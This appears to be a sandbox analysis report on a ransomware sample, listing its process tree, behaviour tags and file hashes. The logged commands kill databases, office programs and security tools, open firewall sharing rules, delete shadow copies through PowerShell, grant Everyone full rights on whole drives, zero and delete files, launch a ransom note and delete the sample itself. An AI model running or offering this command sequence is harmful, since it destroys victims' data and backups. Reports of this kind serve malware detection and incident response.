C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:3328
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2136
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3388
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:428
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2120
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3952
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3116
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1324
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:384
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3848
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:752
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3868
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3400
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4104
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4140
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
PID:4212
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
PID:4224
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4332
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes2⤵PID:4320
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4412
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4480
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4512
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4584
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4636
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4688
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
PID:4740
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4780
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4792
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4856
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4988
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5052
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5064
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta2⤵PID:5076
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3948
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵PID:4148
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
PID:4348
-
-
C:\Windows\SysWOW64\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵PID:5040
-
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1296
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4188
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4276
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4268
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3984 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of AdjustPrivilegeToken
PID:4212
-
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3856
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3968 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of AdjustPrivilegeToken
PID:4224
-
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4456
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4504
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4516
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4612
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4824
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4728
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4640
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4996
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4968
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4656
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe2⤵PID:3824
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 33⤵PID:1580
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5bbf67560d18bd3657aa8cd7ee0286c34
SHA15b067355e1f5ebdf551886c2f9aa916205c915b7
SHA256dc2d9326c65de82075eeae75eab56c5f53fcbf445586d81888279f189b6180b5
SHA51251839ce413e41d8b0b405b25f26e7d2355184184e0c3bc110410b43c03d968dddfe6a91fae618345417078751f3434d3acccfa2fdb26562e4543e0df732fe94d
-
Filesize
21KB
MD5de31bf120448e7467766942d8d7e55eb
SHA1ce49f68a55beafb1638055bd377c89acf641f3d9
SHA2568b817d354dc584abee9bb4a822a65ceb6680ad730ef021b74a7b5dcd7840bda6
SHA512a088c8786af5669db7b5e34e20d3b883b04b17f88d64ea816e345a8ecc618beceb9fb1ba9b3dd44a4f6291903d5bd1cf90a3614585c5b49ef1909460ff4f7053